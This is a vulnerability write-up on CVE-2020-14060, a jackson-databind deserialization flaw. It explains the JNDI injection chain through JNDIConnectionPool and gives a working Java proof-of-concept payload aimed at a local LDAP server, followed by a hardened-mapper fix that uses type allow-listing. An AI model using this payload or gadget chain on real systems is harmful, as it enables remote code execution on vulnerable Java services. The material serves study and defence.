(CVE-2020-14060) FasterXML jackson-databind Deserialization Vulnerability
=========================================================================

3.18 KB / 2021-04-21 09:23:46
    
I. Vulnerability Overview
-------------------------
    
**Exploitation conditions**: `enableDefaultTyping()` is turned on, and the application uses the `org.apache.drill.exec:drill-jdbc-all` third-party dependency.
    
II. Affected Versions
---------------------
    
- jackson-databind before 2.9.10.4
- jackson-databind before 2.8.11.6
- jackson-databind before 2.7.9.7
    
III. Reproduction
-----------------
    
### Vulnerability Analysis
    
We first locate the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` class and find a suspicious JNDI injection point (1.png). The parameter is `jndiPath`; this class has a matching setter for it, and during deserialization `setJndiPath` is called to assign the value, so it is attacker-controlled (2.png).

However, our `findDatasource` is not called by that alone. A global search for the `findDatasource` function finds two call sites: one is `testConnect()`, which is of no use to us; the other is `getConnection()`, which is called during serialization (3.png).

So during deserialization we can point `jndiPath` at a malicious `LDAP` server; when serialization takes place, `getConnection` is called, which in turn calls `findDatasource`, and the result is `JNDI` injection. The full chain is as follows:
    
    mapper.readValue
        ->setJndiPath
            ->getConnection
                 ->findDatasource
                     ->context.lookup(this.jndiPath);
    
### Vulnerability Reproduction
    
    > pom.xml
    
    <dependencies>
      <dependency>
        <groupId>com.fasterxml.jackson.core</groupId>
        <artifactId>jackson-databind</artifactId>
        <version>2.9.10.4</version>
      </dependency>

      <dependency>
        <groupId>org.apache.drill.exec</groupId>
        <artifactId>drill-jdbc-all</artifactId>
        <version>1.4.0</version>
      </dependency>

      <dependency>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-nop</artifactId>
        <version>1.7.2</version>
      </dependency>
      <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
      <dependency>
        <groupId>javax.transaction</groupId>
        <artifactId>jta</artifactId>
        <version>1.1</version>
      </dependency>
    </dependencies>
    
Note: the library used for this vulnerability must be version 1.4; later versions no longer contain the vulnerable class, and the current latest release is already 1.17.0, so on the whole this chain is of limited practical use.
    
    > POC:
    
    package com.jacksonTest;

    import com.fasterxml.jackson.databind.ObjectMapper;

    import java.io.IOException;

    public class Poc {
        public static void main(String[] args) throws Exception {
            ObjectMapper mapper = new ObjectMapper();
            // Precondition from section I: default typing accepts the ["class", {...}] form.
            mapper.enableDefaultTyping();
            String payload = "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";
            try {
                // Deserialization: setJndiPath stores the controlled jndiPath value.
                Object obj = mapper.readValue(payload, Object.class);
                // Serialization: getConnection -> findDatasource -> context.lookup(jndiPath).
                mapper.writeValueAsString(obj);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
    
Running the program then executes the command successfully and pops up a calculator:

(4.png)
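As an added example that is not part of the original write-up, the following shows the supported way to replace the `enableDefaultTyping()` call in the POC: an allow-listing `PolymorphicTypeValidator`, which rejects the gadget's type id before the class is instantiated (so `setJndiPath` never runs) while still deserializing the application's own classes. It assumes jackson-databind 2.10 or later, where `activateDefaultTyping` exists; the `HardenedMapper` class, its nested `Point` model class and the `MODEL_JSON` input are constructed for this illustration.

```java
package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;
import java.io.IOException;

public class HardenedMapper {

    // Same shape as the POC payload: the gadget class from the write-up plus a
    // constructed LDAP URL that is never contacted, because the type id is rejected.
    static final String GADGET_JSON =
        "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\","
        + "{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";
    // Constructed input naming a legitimate (hypothetical) application class.
    static final String MODEL_JSON =
        "[\"com.jacksonTest.HardenedMapper$Point\",{\"x\":1,\"y\":2}]";

    public static class Point { public int x; public int y; }

    /** Replacement for the POC's enableDefaultTyping(): type ids are allow-listed. */
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            // Only classes in our own package may be named by a polymorphic type id.
            .allowIfSubType("com.jacksonTest.")
            .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return mapper;
    }

    /** True if the mapper refused the type id before instantiating the class,
     *  i.e. before any setter such as setJndiPath could run. */
    static boolean rejectsTypeId(ObjectMapper mapper, String json) throws IOException {
        try {
            mapper.readValue(json, Object.class);
            return false;
        } catch (InvalidTypeIdException e) {
            return true;
        }
    }

    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = hardenedMapper();
        System.out.println("gadget rejected: " + rejectsTypeId(mapper, GADGET_JSON));
        Object p = mapper.readValue(MODEL_JSON, Object.class);
        System.out.println("model accepted: " + (p instanceof Point));
    }
}
```

On the 2.9.x line, which lacks the validator API, the fix is to upgrade past the affected versions listed above.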
    
References
----------
    
> https://xz.aliyun.com/t/8012#toc-12
    
    